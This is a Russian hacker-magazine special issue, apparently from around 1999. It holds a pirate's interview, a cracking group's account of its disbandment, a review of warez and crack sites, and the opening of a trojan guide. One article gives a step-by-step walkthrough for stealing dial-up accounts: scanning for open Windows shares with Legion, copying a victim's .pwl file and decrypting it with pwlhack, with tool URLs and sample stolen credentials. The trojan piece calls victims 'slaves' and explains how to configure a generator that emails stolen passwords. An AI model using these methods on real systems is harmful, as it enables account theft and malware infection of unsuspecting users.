— Самое смешное, что борьба так же, как и пиратство, не идет на пользу нашей стране. И знаешь, почему? Ну, например, борется с нами «Русский щит». Он борется за права каких-то определенных фирм. «Русский щит» заключил с ними договор, он их должен поддерживать. Значит, как все должно происходить по идее? Приезжает «Русский щит», например, к нам на рынок и смотрит: ага, вы не продаете ту продукцию, которую мы защищаем, значит, вы нас боитесь, все о’кей, а то, что мы не защищаем, вы, пожалуйста, продавайте. Но делается же все не так. Забирается тогда все, есть ли на лотке продукция, которую они защищают, нет ли ее — забирается все подчистую. И что дальше? Куда все девается? Пропадает. Потому что никто не пойдет права качать, мол, да, я пират, отдайте мне мои вещи, верните мои диски и все такое :). Диски, естественно, пропадают. Кому толк от этого? Никому. То есть государству от этого ничего не прибавилось, пират тоже потерял все — ноль полный. Дальше. Ну, хорошо, вот осудят меня, например, возьмут с меня какие-то там 10 минимальных окладов, 15 минимальных окладов — ну, поймают меня, короче. Будет суд, будет задействован судья, прокурор, еще кто-то — масса народа. Суд стоит каких-то определенных денег, правильно? То есть затрата на меня идет. Мне скажут: ты должен выплатить штраф. Хорошо, я выплачу 10 минимальных зарплат. Это все, что приобретет государство. Все. Опять получается, что пользы никому. Ну, забрали они грузовик этих дисков, ну, пустили их под лом. Ну и что, кому? Кому от этого выгода? Да никому. Толку от этого нет никакого. Они, в принципе, действуют очень разумно, но у них все не отработано, понимаешь? По идее, они начинали в общем-то не с плохого, они защищают наши организации, которые вкладывают деньги в свои разработки, свои игры. Задумка была хорошая, и ребята там неплохие, достаточно грамотные, с ними можно было бы работать, какой-то навели бы на рынке порядок. А вылилось все во что? В давление. Приехали с ОМОНом на рынок, всех забрали — и все. А по идее как? Вы защищаете права вот этих организаций, вот нет этих игр у человека, оставьте его в покое. Нет, надо опять всех под одну гребенку. Вот тебе. пожалуйста.


Спецвыпуск хакер, номер #001, стр. 001-092-3, Эксклюзивное интервью пирата для Х

Эксклюзивное интервью пирата для Х

Холод (holod@xakep.ru)

Спецвыпуск хакер, номер #001, стр. 001-092-3

— А вот кто за это платит? Они с ОМОНом приехали — он же не бесплатно приезжает.

— Я знаю, что если, например, Microsoft совершает какую-то акцию, то, естественно, оплачивает Microsoft, представительство которой у нас есть, кстати. Злобная девочка этим самым всем заведует :). Вот как раз когда от них акция идет, там и ОМОН задействован, и все такое. Ну и что? Ну провели они акцию. И у них разумного нет ничего. Потому что не вотрешь народу, что нужно купить за сотню баксов Windows’98 и поставить себе на компьютер. Так что все впустую. Вообще все компьютерное дело поставлено на пиратах. Человек покупает себе компьютер один раз. Он рассчитывает дешево поставить софт, он на это рассчитывает, он же покупает дорогой компьютер. Представь себе: сейчас не будет ни этого софта, ни игрушек — ничего не будет, вот все ушло. И этот бедный человечек должен покупать коробки. Купит он компьютер? И на этом все закончится, понимаешь, в чем дело? Да, серьезные фирмы могут себе позволить купить софт за сумасшедшие деньги, а все остальные-то не могут себе этого позволить. Ну, или купят, может быть, на сбор одну игрушечку, будут обмениваться, то есть опять-таки, понимаешь, не будет от этого толку. То есть о чем здесь речь? Борьба против пиратства идет для того, чтобы деньги были у нас в стране, правильно? И чтобы мы не наносили ущерб еще и другим странам. А здесь, понимаешь, нет ни того, ни другого. Вот логики я не вижу в такой борьбе. Сейчас на Петровке должно быть совещание по поводу всего пиратства — видеопиратства, аудиопиратства, компьютерного пиратства. Вот что они могут придумать? Постоянно делать облавы они не смогут, сделают это 1-2 раза — все. На большее все равно не хватит денег. Ну дальше что? Это так же, как с долларом, понимаешь, это если сейчас вдруг отменить доллар. Ну в какие рамки его сейчас загонят? Люди все равно его будут покупать, правильно? Будет черный рынок. И доллар будет стоить дороже. А CD? Для народа это уже как наркотик, умственный наркотик. Человек всегда хочет получать информацию. Да, все уйдут в подполье, диск будет стоить дороже, пусть я буду продавать 10 дисков, но уже по другой цене, у меня будет своя клиентура. И у всех так будет. То есть это не борьба с пиратством. Поэтому все, что сейчас происходит — это так, видимость борьбы. Потому что силовой метод никогда не будет действенным на человека. А у нас идет все с позиции силы. Вот и вся суть.


Спецвыпуск хакер, номер #001, стр. 001-092-4, Эксклюзивное интервью пирата для Х

Эксклюзивное интервью пирата для Х

Холод (holod@xakep.ru)

Спецвыпуск хакер, номер #001, стр. 001-092-4

— То есть, в принципе, на данном этапе бороться с вами фактически бесполезно?

— Абсолютно. С интеллектуальными вещами нужно бороться интеллектуально. Здесь же силовой метод-то бесполезен.

— Кроме зарабатывания денег, есть ли сейчас у пирата другие цели? Может быть, интерес какой-то...

— Сейчас это работа. Раньше, если ты помнишь, когда дискеты еще были, потом это золото — тогда как раз не столько были деньги на первом месте, а интерес к тому, что для нас было в диковинку. Компьютеры же тогда только появились. Вот тогда было больше стремления что-то узнать, что-то поставить новое на компьютер, тогда даже игрушки ценились больше, правда. Люди получали одну игрушечку, они ее проигрывали от и до, потому что это была редкость. У нас же не выходили с такой бешеной скоростью игры. Ты вспомни, появлялась одна игра в месяц, ну две игры. Что сейчас творится в Америке? Там человек покупает игру и полгода в нее играет. Потому что он платит за нее большие деньги. Вот тогда у нас все ценилось дороже, понимаешь, тогда и публика была другая. Компьютер мог себе не каждый позволить, более интеллектуальная была публика. Сейчас все немножко другое.

— Если убрать весь пиратский софт, народ ведь деградирует...

— Это да. Чем он займется? Наркотиками, водкой. 100%, потому что если сейчас они сидят за компьютерами и деньги они вкладывают в компьютер, в игрушки, в софт. Причем, прослеживается интересная вещь. Человек идет все время куда-то вверх, очень мало людей остается на уровне игр, заметь. То есть все начинается с игрушек, а потом все, как правило, уходят в софт. У людей появляется интерес идти дальше. А возвращаясь к теме, я уверен, что без компьютеров все уйдет в водку, наркотики и все такое. Потому что человеку надо чем-то заняться, а заняться-то будет нечем.


Спецвыпуск хакер, номер #001, стр. 001-092-5, Эксклюзивное интервью пирата для Х

Эксклюзивное интервью пирата для Х

Холод (holod@xakep.ru)

Спецвыпуск хакер, номер #001, стр. 001-092-5

— О’кей, последний вопрос. Наша страна — единственная, кто так хулиганит?

— Ничего подобного. В любой стране есть пиратство. 25% пиратства. Есть даже страны, к сожалению, не помню, какие, 2 или 3 страны, в которых законы о пиратстве есть, где пиратство узаконено. Им плевать на Америку. Так же как Европе, например, плевать, что есть доллар. У них есть своя валюта. И в Америке тоже есть пиратство. Да, там их вылавливают, с ними там борются, но они там тоже есть. Кстати, у нас более сознательно относятся к отечественным фирмам. Смотри, 1С практически никто не продает. Заметь, на рынках очень редко ты выловишь 1С. Ведь когда «Русский Щит» объявил, что Бука выпустит своих «Heroes III», все стали ждать буковского перевода. Может быть, отморозки партию пиратскую выпустили, причем, с жутким переводом, и ,кстати, мало кто у них игрушку покупал.

А пиратство есть везде. И потом они там тоже зарабатывают деньги. Они же мастердиски сдают нам :). Они что, патриоты своей родины? И потом, как говорится, тухнет рыба с головы. И там то же самое.


Спецвыпуск хакер, номер #001, стр. 001-094-1, Почему закрылась группа UCLabs

Почему закрылась группа UCLabs

Спецвыпуск хакер, номер #001, стр. 001-094-1

Пресс-секретарь UCLabs Юрий Мелкаас (melkaas@mail.ru)

Так повелось, что издавна особый интерес у людей вызывали события, которые каким-то образом влияли на их жизнь, но адекватного объяснения не имели. Как правило, множество «трактователей» и «описателей» подобных событий неизбежно вкладывают помимо объективных фактов всякого рода выражения, как-то: «я думаю», «это, скорее всего, значит», «налицо» и т.д. Что в свою очередь трактуется далее и т.п. В общем, нет смысла объяснять механизм возникновения слухов и домыслов. Все прекрасно наслышаны про «тайные знания» колдунов, про таинственный преступный мир и наркомафию, проделки злобных и всемогущих хакеров... Однако иногда, когда так называемое «бытующее мнение» переходит границы домыслов и начинает оказывать реальное воздействие на реальный мир и реальных людей, волей-неволей кому-то приходится развеивать мифы, даже если это выглядит как оправдание — дескать, «ладно вам отмазываться, все и так все знают».

Ближе к фактам.

Двадцать девятого марта 1999 года российская группа UCL (United Crackers League) официально прекратила свое существование, о чем было объявлено на сайте http://www.ucl.ru. В дальнейшем все упоминания о UCL и ее «членах» надо рассматривать с приставкой «бывшие». Само по себе это событие достаточно малозначимое, но, тем не менее, на http://www.computerra.ru появилась достаточно сомнительная статья под названием «Хакерам надают по мозгам». В ней факт реорганизации группы объясняется повышением интереса правоохранительных органов к деятельности группы, а также реальным фактом ареста одного из якобы членов группы, некоего Лишутина Андрея («Лешего»). Возникшая затем дискуссия на данном сайте не привела ни к чему, потому что в ответ на доводы бывших членов UCL автор статьи занял наиудобнейшую позицию — «если можете — опровергните, нет — молчите в тряпочку». «В тряпочку», естественно, молчать никому не хочется, и желание хоть как-то приостановить тот бред, который несут некоторые компьютерные издания, и послужило предпосылкой написания этой статьи.

Хакеры и крэкеры

Прежде всего целесообразно отделить United Crackers League в частности и так называемых крэкеров (crackers) вообще от того, что именуют хакерами (hackers). Единственное общее и у тех и у других — это «средство производства» — компьютер. Хакеры занимаются взломом сетевых устройств и сетевых операционных систем. Как правило, наглядный результат работы хакеров — порча web-страниц и прочий явный вред — в основном, дело рук ребят по 14-16, очень редко 17 лет. На этот счет, кстати, есть определенное мнение. Вот, например, когда такие же ребятишки расписывают стены из баллончиков — что с ними делают? Уж точно не врываются с ОМОНом и не конфискуют все красительные средства, не говоря о более серьезных последствиях. Хотя это уже отдельный разговор.

Итак, United Crackers League (далее UCL) была создана в 1994 году и сразу же заняла лидирующее место в снятии защит с программ. UCL объединила ведущих российских (и не только) крэкеров — людей, занимающихся снятием защит именно с программ. Основным отличием UCL от аналогичных зарубежных групп было то, что команда не являлась пиратской и не занималась распространением программного обеспечения.


Спецвыпуск хакер, номер #001, стр. 001-094-2, Почему закрылась группа UCLabs

Почему закрылась группа UCLabs

Спецвыпуск хакер, номер #001, стр. 001-094-2

Во всем мире существует достаточно развитая система обмена пиратским программным обеспечением. Как правило, в подобных «пиратских» группах крэкеры играют отнюдь не ведущую роль. Постольку поскольку достаточное количество программных средств вообще не имеет никакой защиты (кроме правовой, конечно) и может свободно, при наличии всего одного ключа, использоваться кем угодно. (Кстати, некоторым поборникам легального программного обеспечения советуем задуматься, как бы в пример, — легальна ли ваша копия Windows или это просто «спираченная» операционка с «левым» ключиком?). Дело в том, что истинно пиратские группы функционируют в силу определенных обстоятельств в основном в странах «развитого капитализма», поскольку только там люди понимают, что любая программа имеет свою конечную стоимость. Поэтому способ «натурального обмена» очень просто объясняет отсутствие какой-либо денежной базы внутри пиратской группы, либо на рынке пиратских групп.

Соответственно, вся работа внутри пиратской группы делится между ее членами по «профессиям». Если приблизительно описать механизм, то одни поставляют программное обеспечение (suppliers), другие, если необходимо, его взламывают (crackers), третьи (couriers) разносят эти уже взломанные программы по серверам, четвертые (traders) осуществляют обмен между различными серверами различных групп. За эту работу все члены группы имеют доступ к данным серверам и получают программное обеспечение бесплатно. Вот это пример истинно пиратской группы, которая занимается распространением программного обеспечения в «тираж». В день может таким образом выходить до 100 наименований программного обеспечения. Можно представить себе размах и масштабы функционирования такого синдиката. Но, говоря о «рынке пиратского программного обеспечения», прежде всего надо помнить именно о таких «натуральных» взаимоотношениях, но ни в коем случае не об извлечении денежной прибыли.

Другое дело Россия, в которой изначально не существовало (да и по сей день не существует) мощных компьютерных коммуникаций. Как правило, крэкеры в России имели совсем другую предпосылку для появления. Но об этом позже. За несколько лет команда UCL разрослась и стала практически единственной группой такого профиля в республиках бывшего Советского Союза. Принадлежность к UCL являлась лучшей рекомендацией: это также означало, что человек может не только копаться отладчиком в чужих программах и защитах, но в состоянии написать свою программу любого уровня сложности (чего стоит только то, что в любой пиратский синдикат или группу крэкеров из UCL зачисляли без рекомендаций и испытательных сроков). Да и кто может создать свою собственную систему, которая не будет уступать, а будет превосходить аналоги, если не человек, способный быстро разобраться в математических алгоритмах и методах, имеющий опыт анализа более чем тысячи различных видов защит?


Спецвыпуск хакер, номер #001, стр. 001-094-3, Почему закрылась группа UCLabs

Почему закрылась группа UCLabs

Спецвыпуск хакер, номер #001, стр. 001-094-3

Возвращаясь немного назад, необходимо немножко пояснить, как все-таки появились крэкеры в России. Естественно, отрезанные от мира долгое время и не имеющие online-поддержки, а также технических консультаций и т.д., российские пользователи и программисты приобрели странный менталитет. В основном его можно обозначить как «если программа не работает как надо — значит, необходимо сделать так, чтобы она работала». Принципиально это можно перенести не только на программный рынок. Но, тем не менее, сложилось так, что крэкеры в России в большинстве своем занимались проблемами тех, кто в силу отсутствия знаний не мог сам адаптировать программу. И, естественно, что на каком-то этапе начали возникать денежные отношения. На самом деле здесь нет ничего общего с тем, что порой пишут в некоторых СМИ — дескать, «ломають, а потом ходють по людям и предлагают ломаные программы за полцены». На самом деле крэкер обычно выполняет разовую работу по снятию защиты по просьбе заказчика. Это можно сравнить, я думаю, с тем, что вы просите кого-то сделать дубликат ключа от двери. И, естественно, платите за это деньги. И очень спорный вопрос, «кто несет ответственность за то, что этим ключом кто-то еще вскроет дверь чужой квартиры?». Скорее всего — тот, кто им эту дверь открыл.

Тем не менее, 29 марта 1999 года общим

собранием UCL было принято решение о расформировании группы.

Многие, как уже было сказано, связывают этот факт с задержанием Андрея Лишутина, но это не так: никакой прямой и косвенной связи нет, группа шаг за шагом шла к осознанию того, что крэкерство и продажа «крэков» не может принести ощутимого дохода и что создание своих систем защиты ПО может служить более серьезным основанием для формирования своего бизнеса, чем их снятие. Кроме того, в мире существует огромное количество тестовых криптоаналитических лабораторий, которые, по сути, занимаются крэкерством в чистом виде, но при этом являются, что называется, юридическими лицами и получают от фирм-производителей средств защиты реальные деньги. Тем более что опыта для этого более чем достаточно, к тому же появились потенциальные источники финансирования этого бизнеса.

Но все-таки,

кто же такой «Леший»?

Итак, как уже было сказано, 31 марта 1999 года в журнале «Компьютерра-Online» появилась претенциозная статья главного редактора А.Шипилова «ЛЕШИЙ АРЕСТОВАН! Хакерским движениям в России приходит конец!», в которой автор со свойственной ему некомпетентностью приводит свою версию случившегося и связывает закрытие сайта UCL (www.ucl.ru) с задержанием Андрея Лишутина, без малейшего уважения называя последнего Лешим. Такую вольную трактовку автор допускает и по отношению к профессии Андрея, вдруг превратившегося из простого специалиста по программным продуктам фирмы 1C в «одного из наиболее квалифицированных и талантливых российских взломщиков». Свои сведения о задержании (а не аресте, как утверждает Шипилов) Андрея Лишутина и прочих «фактах» автор якобы получил из никому не ведомых источников, даже не удосужившись связаться с Андреем.


Спецвыпуск хакер, номер #001, стр. 001-094-4, Почему закрылась группа UCLabs

Почему закрылась группа UCLabs

Спецвыпуск хакер, номер #001, стр. 001-094-4

Андрей Лишутин никогда не являлся членом UCL и тем более никогда не был крэкером (хотя вопрос о членстве в UCL, конечно, недоказуем, как справедливо заметил г-н Шипилов, особенно если говорить о простом объединении, даже не зарегистрированном официально). Возвращаясь к разговору о ключах и дверях, заметьте разницу: можно не являться крэкером, но заниматься продажей взломанного программного обеспечения (это не совсем относится к Лишутину в данном случае — ниже мы объясним, почему). Задержание Андрея, бывшего дилером программного аналога электронного ключа HASP, по мнению некоторых членов UCL, было инспирировано фирмой Aladdin, которая пошла на такие меры из-за желания сохранить монополию на средства защиты, в частности, на ключ HASP. Но, не желая опускаться до уровня некоторых изданий, мы не будем развивать эти домыслы, а просто расскажем, что же на самом деле представляет собой HASP.

Это система программно-аппаратной защиты на основе электронных ключей с энергонезависимой памятью. Существует несколько моделей ключа, такие как HASP-3, Memo HASP-1, Memo HASP-4, Time HASP, Time HASP-4, Net HASP, PCMCIA-HASP, Open HASP и еще несколько вариантов для компьютера Apple Macintosh.

Не так давно группа UCL сделала полную программную модель данного ключа. То есть вам необходимо вставить ключ на 10 секунд в LPT порт, запустить сканер, и более HASP вам не нужен. При этом не требуется внесения абсолютно никаких изменений в программу, которая защищена этим ключом, т.к. ключ полностью эмулируется программными драйверами. Это и называется программным аналогом электронного ключа HASP, который распространял Андрей Лишутин.

С точки зрения здравого смысла данный программный эмулятор является отдельной самостоятельной программой, и его абсолютно справедливо можно считать защитой, так как программы без наличия данного эмулятора не работают. Итак, все, что делает внешний ключ, спокойно выполняется программно — зачем же тогда платить за него деньги, ведь этот набор микросхем стоит гораздо дороже, чем набор программных инструкций? Тем более что все патенты и сертификаты на алгоритмы здесь ни при чем. Программисты UCL использовали свои более простые и эффективные алгоритмы для написания эмулятора, которые даже приблизительно не походят на оригинальные.

Самое интересное, что ключ HASP получил сертификат Министерства Обороны США не так давно, когда он был уже взломан на все 100%. Зарубежные специалисты оценили его криптостойкость как 99.9%, что соответствует 64-битным и выше методам шифрования с ключом, и это при том, что его реальная криптостойкость составляет 5^6, то есть 15625 комбинаций, а это меньше 10 секунд перебора. Напрашивается вполне резонный вопрос — кто его тестировал и что же это за специалисты? И почему никто не нашел этого, кроме UCL? И даже теперь, зная об этом, Aladdin все равно продолжает рекламировать и продавать этот ключ, заранее зная, что обманывает своих покупателей.

Есть еще много интересных примеров на эту тему, касающихся не только ключа HASP, а и более продвинутых защит и электронных ключей. И какой смысл в сертификации таких защит непрофессионалами, когда 16-20-летние ребята взламывают программы с суперсертифицированными защитами, стоимость которых доходит до 20.000 долларов и даже больше? Это случай, когда один программный продукт стоит в несколько раз дороже более-менее мощного компьютера.


Спецвыпуск хакер, номер #001, стр. 001-094-5, Почему закрылась группа UCLabs

Почему закрылась группа UCLabs

Спецвыпуск хакер, номер #001, стр. 001-094-5

А все потому, что обыкновенный программист и крэкер — это люди, имеющие практически одинаковую базу, но разные области применения. Потому что они думают, как те, кто будет эти защиты вскрывать. Потому что нет методики, которая позволяла бы разрабатывать хорошие программные защиты, не анализируя уже существующие. Иначе все бы повторяли (да, в общем-то, повторяют) ошибки предшественников в разработке методов. И, в конце концов, потому что защитой дорогого и мощного программного обеспечения должны заниматься не просто профессионалы-теоретики, а суперпрофессионалы. В этом случае выигрывают оба — и производитель, и исследовательская лаборатория, и затраты на тестирование и создание окупаются полностью. Иначе... что ж, результаты знают все.

Фирма Parametric Technology может, например, смело подавать в суд на производителей менеджера лицензий (еще один способ защиты) FlexLM. Потому что сам запатентованный алгоритм достаточно криптостоек, а его программная реализация уменьшает его криптостойкость в два раза. Pro Engineer вместе c комплектом дополнительных программ стоит около 200 000 долларов. Вот и посчитайте, какой примерно они понесли ущерб.

Невольно напрашивается вопрос — зачем крэкерам это надо? Сидели бы, ломали потихоньку этот HASP и все остальное и никому ничего не говорили — больше было бы заказов на крэк. Ведь бытует мнение о том, что настоящие хакеры/крэкеры никогда не будут светиться, потому что все, кто умеет что-то «серьезное», сидят себе тихонько, а на весь свет кричат только дилетанты и идиоты, которые и «пороху не нюхали»...

Все объясняется просто: UCLabs (ex-UCL), как было сказано, действительно начали заниматься серьезными вещами и именно легальным бизнесом.

Поэтому, не претендуя на рекламу, скажем все же, что защиту программ надо доверять только специалистам и всячески поощрять их стремления, а не прибегать к каким-либо репрессивным мерам, не разобравшись в том, кто есть кто. К сожалению, немало времени потребуется всем, в том числе законодателям и правоохранительным органам, чтобы разобраться в специфике компьютерного мира. До этого момента сторонних людей, не имеющих никакого отношения к определенным областям компьютерной деятельности, так и будут во всеуслышание называть хакерами, крэкерами, фрикерами и т.д., не имея ни малейшего понятия, что это такое на самом деле (вспомните историю с Левиным). И до этого момента достаточное количество разного рода компьютерных изданий будет делать себе рекламу на разного рода дилетантских «хакерских» историях.


Спецвыпуск хакер, номер #001, стр. 001-096-1, Ты должен знать, как тебя хакают!

Ты должен знать, как тебя хакают!

Jaguar

Спецвыпуск хакер, номер #001, стр. 001-096-1

Азнаешь ли ты, друг мой, о том, как хакеры «вытаскивают» твои драгоценные аккаунты прямо у тебя из-под носа? Для тех, кто первый раз держит Х в руках, объясняю: аккаунт (учетная запись, имя пользователя и пароль — как угодно) — это твои login и password, которые ты, дружище, используешь для входа в Интернет.

Известно достаточно много случаев, когда пользователь с удивлением для себя обнаруживает, что за его счет бродит по просторам Интернет кто-то еще и, естественно, тратит направо и налево его потом и кровью заработанные деньги. Узнав о столь неприятном происшествии, он в ярости (или в недоумении — кто как) звонит в техподдержку своего провайдера и объясняет причину своего недовольства. Провайдер приносит свои соболезнования, но, к сожалению, ничем помочь не может, однако предлагает сменить пользователю пароль и советует не допускать до компьютера тех людей, которые не достойны доверия. А самое главное, что тем людям, которые платят свои деньги за часы, проведенные в Интернете, провайдер не собирается возмещать ни денег, ни времени. Разочаровавшись и обвиняя во всех мнимых грехах техническую поддержку, ты размышляешь о том, как же этому гадскому хакеру удалось украсть твой аккаунт, и с обидой в душе на этот жестокий мир подумываешь о смене провайдера. Итак, каким же образом хакер смог «вытащить» твой аккаунт?

На сегодняшний день мне известны несколько методов, которые используют хакеры. Обычно многие юзеры, устанавливая Windows 95/98/NT под сети, предоставляют доступ к своим дискам и директориям другим пользователям сети, тем самым открывая лазейку в свой компьютер. Для того чтобы в сети найти компьютер с такой лазейкой, хакеру необходимо просканировать диапазон IP-адресов одной сетки. Что для этого нужно? Для Windows 95/98/NT — программа «Legion» (http://207.98.195.250/software /legion.zip). После запуска этой программы нужно указать IP-адреса, которые будут использоваться для сканирования. Сначала хакер выбирает предполагаемого провайдера, услугами которого впоследствии он будет пользоваться. Например, это будет выдуманный нами провайдер www.lamerishe.ru. Запустив свой mIRC, он отправляется на всем знакомый IRC и в окошке «status» пишет: /whois *.lamerishe.ru.

Ответ не заставит себя ждать:

#RUSSIAN Andrey H andrey@dialup-28059.lamerishe.ru :0 hello.

*.junk.com

End of /WHO list.

Дальше следует команда:

/dns Andrey

И mIRC выдает ему IP-шник жертвы:

*** Looking up dialup-28059.lamerishe.ru

*** Resolved dialup-28059.

lamerishe.ru to 121.31.21.10

Вот он уже и знает один из IP-адресов (121.31.21.10) нашего выдуманного провайдера. Теперь нужно указать диапазон IP-адресов этого провайдера. Хакер запускает Legion и заполняет поля «Enter Start IP» (введите начальный IP) и «Enter End IP» (введите конечный IP).

Enter Start IP: 121.31.21.1

Enter End IP: 121.31.21.254

Остается только выбрать скорость соединения и нажать на кнопку «Scan». Если после сканирования в правом окне сканера появится что-то вроде «\\121.31.21.87\C», то в левом окне можно открыть этот IP и щелкнуть два раза на ответвлении «C». Появится сообщение «MAPPED ON DRIVE E:». Все это означает, что на данном IP есть машина c незашаренным (то есть открытым для всех) диском С. И этот диск можно установить как еще один диск на своем компе. То есть у хакера на компе появится еще один диск (в данном случае — Е), по которому он будет лазить, как по своему собственному, хотя он и находится на удаленной машине. Конечно, главной целью для хакера является файл с расширением .pwl, в котором находится зашифрованный аккаунт. Этот файл лежит в каталоге Windows. И поэтому хакер заходит в «Пуск -> Программы -> Сеанс MS-DOS». Пишет там «e:» и нажимает Enter. Теперь он на жестком диске у чайника. Но каталог Windows может называться по-другому. Поэтому он пишет: E:\>dir win* и получает такой вот ответ:


Спецвыпуск хакер, номер #001, стр. 001-096-2, Ты должен знать, как тебя хакают!

Ты должен знать, как тебя хакают!

Jaguar

Спецвыпуск хакер, номер #001, стр. 001-096-2

Том в устройстве Е не имеет метки

Серийный номер тома: 2247-15D0

Содержимое каталога Е:\

WIN95 <КАТАЛОГ> 11-30-98 6:48p WIN95

0 файл(а,ов) 0 байт

1 каталог(а,ов) 287,997,952 байт свободно

Дальше следуют команды:

E:\>cd win95

E:\WIN95>dir *.pwl

Том в устройстве Е не имеет метки

Серийный номер тома: 2247-15D0

Содержимое каталога Е:\WIN95

ANDREY PWL 730 02-05-99 10:31p ANDREY.PWL

1 файл(а,ов) 730 байт

0 каталог(а,ов) 287,997,952 байт свободно

E:\WIN95>copy andrey.pwl c:\hacking\pwlhack

Теперь, после копирования файла с расширением .pwl, хакеру нужно отсоединиться от этого компьютера. Он открывает иконку «Мой компьютер», выбирает иконку E:\121.31.21.87\C, нажав правую кнопку мыши. Там жмет «Отсоединить». Что теперь? А теперь он берет программу pwlhack (http://newdata2.box.sk/neworder /crackpwd/pwlhck32.rar) и с помощью нее расшифровывает добытый файл andrey.pwl.

C:\HACKING\PWLHACK>pwlhack.exe /list andrey.pwl andrey

(C) 17-Apr-1998y by Hard Wisdom «PWL’s Hacker» v3.0 (1996,97,98)

Enter the password:

File ‘ANDREY.PWL’ has size 730 bytes,

version [NEW_Win95_OSR/2]

for user ‘ANDREY’ with password ‘’ contains:

[Type]-[The resource location string]

[Password]-

Dial X *Rna\Соединение с lamerishe\L5tRe fsa3Xfa12

Indexed Entryes: 1; Number of resources: 1.

Настает кульминационный момент! Итак, теперь с помощью аккаунта, добытого у «чайника», хакер может лазить по просторам всемирной паутины Интернет. А вот и сам аккаунт:

Имя пользователя: L5tRe

Пароль: fsa3Xfa12

Если у данного провайдера можно посмотреть статистику прямо из Интернета, то обычно хакеры посещают сайт провайдера (в нашем примере www.lamerishe.ru) и смотрят, сколько осталось денег на счету у пользователя и в какое время он обычно находится в Интернете. Кстати, телефоны модемных пулов также можно узнать на сайте у провайдера. :)

Существует еще несколько иных способов, таких как использование троянов Netbus1.0, Netbus Pro 2.0, BackOrifice и т.д. Самый простой из всех способов заключается в том, что, зная IP-адрес с открытыми сетевыми ресурсами, можно соединиться с компьютером, нажав на Пуск, выбрав «Поиск компьютера» и указав IP-адрес.

«Все. Систему я понял. Теперь объясни-ка мне, как устранить лазейку и защитить себя от непрошеных гостей?» — скажешь ты. Хорошо. Для защиты от описанной выше дырки тебе будет необходимо отключить привязку (службу доступа к файлам и принтерам) от контроллера удаленного доступа (лезь в «Панель управления» -> «Сеть»), а в Windows NT нужно запретить службу Server в Remote Access WAN Wrapper. Но от НетБаса, БэкОрифиса и подобных троянов это тебя не спасет. А вот чтобы не подхватить трояна, во-первых, никогда не подпускай никого к своему компьютеру со всякими дискетками, а, во-вторых, никогда не запускай у себя на компе никаких прог, в которых ты хоть на грамм сомневаешься. Последним хакерским способом по рассылке троянов был массовый спамминг с хоста microsoft.com, где в каждом письме лежал якобы патч к 4-му IE. Ну а что этот «патч» делал, я думаю, ты уже догадался. :)


Спецвыпуск хакер, номер #001, стр. 001-097-1, Больше Warez’a!

Больше Warez’a!

(Хорошего и разного)

Спецвыпуск хакер, номер #001, стр. 001-097-1

Андрей Князев

Буржуи.

Самый известный пример — “Две Коровы”, они же TuCows. www.tucows.com (лучше воспользоваться зеркалом, которое находится на мегасервере ИнфоАрт: http://tucows.infoart.ru).

Весьма симпатичный архив с поиском и рейтингом – коровами. Чем больше коров, тем лучше. Но вот канал, того… слегка забит, хотя и ИнфоАрт…Итого, оценка: 3+.

Еще один “классический” сайт – www.warez.com. То что доктор прописал, но… если тебе повезло с выделенкой или у твоего провайдера быстрый канал в забугорье. А так, ну варез — он и в Африке варез. “Ничего таки особливого”, как говаривал герой какого-то нашего кино о войне. Возможности поиска достаточно аскетичны. Хотя подкупает тем, что можно искать не только по варезу, но и, к примеру, по mp3. В общем, стабильная 3.

Но и среди буржуев попадаются “порядочные” люди. К числу таких “джентльменов”, без сомнения, необходимо отнести Fast FTP Search 4.0: http://ftpsearch.lycos.com. Когда-то, на заре туманной юности, это был скромный норвежский сайт, который затем перекупила огромадная Lycos, и поиск стал называться Lycos FTP Search. Это, однако, почти ничуть не умалило его достоинств. Если тебя интересует какая-нибудь экзотическая вещь, то для поиска, особенно в забугорье, Lycos FTP Search — самый оправданный выбор.

Оценка — устойчивая 4.

Родная Русь

Во-первых, Download.ru: www.download.ru. Все аккуратно рассортировано. Есть весьма приятный поиск. Одно но: размер коллекции все же ограничен. И взломщиками здесь не разжиться. А какой же русский не любит хорошего кряка??? В общем, “это тоже гуд”, т.е. верное 4.

Кроме того, не стоит забывать и о ftp–архивах. Самый популярный — это архив КИАЭ (для тех, кто не знаком с историей, — КИАЭ, т.е. Курчатовский Институт Атомной Энергии, — это первое место в стране, где появился Internet!!!) www.kiarchive.ru. Легендарный адрес. По этому гигантскому ftp можно искать нужные файлы, и, без сомнения, все общеупотребительные программы там есть. Оценка — 4+.

Еще один отпрыск Релкома — файловый архив Урал-Релком (он же http://ftp.mplik.ru).

Наиболее примечателен тем, что является официальным файловым архивом Microsoft на территории России. Самые горячие обновления от всеобщей Мелко-Мягкой любимицы (ну куды ж мы без МазДая?) можно без проблем скачать именно отсюда. Оценка — 4+.

Ну и наконец, всеобщий любимец и безусловный лидер этого маленького хит-парада. Русский FTP-Search — http://ftpsearch.city.ru/ftpsearch.ru.html. Наверное, лучший поисковый механизм для всего “мягкого” в России. Широкие возможности настройки поиска. Возможность поиска по выбранному домену и масса других настроек. Годится для поиска всего, начиная от тех же mp3 и вплоть до самых горячих софтин и кряков.

Ну а сейчас извините, Русский ФПТ-поиск нашел нужную программулину. Пойду натравлю ReGet’a…

Содержание


Спецвыпуск хакер, номер #001, стр. 001-098-1, Как стать рабовладельцем в сети

Как стать рабовладельцем в сети

Спецвыпуск хакер, номер #001, стр. 001-098-1

KurT (ICQ: 2950197) and DoC (serguei@earthling.net)

у, о Троянцах, наверное, все слышали. Хорошие это штучки для хакера. Впариваешь глупому юзеру прогу, он ее запускает и сразу становится твоим рабом. Отдает тебе свой Интернет-акаунт, почтовые пароли, аську и всю другую конфиденциальную инфу. Часто он еще дарит тебе доступ к своему винчестеру, позволяет управлять своей мышкой, смотреть на свой экран и т.д. В общем, если рабовладельчество тебе по душе, то Троянцы — это то, что тебе нужно.

Мы с приятелем эту фишку быстро просекли, скачали несколько разных Троянов, но, в конце концов, решили сделать своего. О нем-то мы тебе и расскажем.

Step 1

«Как получить раба»

Для начала скачиваешь себе файл «StlthCfg.exе» (www.xakep.ru/ scfg.exе) — эта программа сгенерирует Трояна и сконфигурирует его под тебя. Чтобы произвести настройку, ты должен ввести свой Email (на него будут приходить спертые Пароли) и свой идентификатор для опознания тебя самой программой.

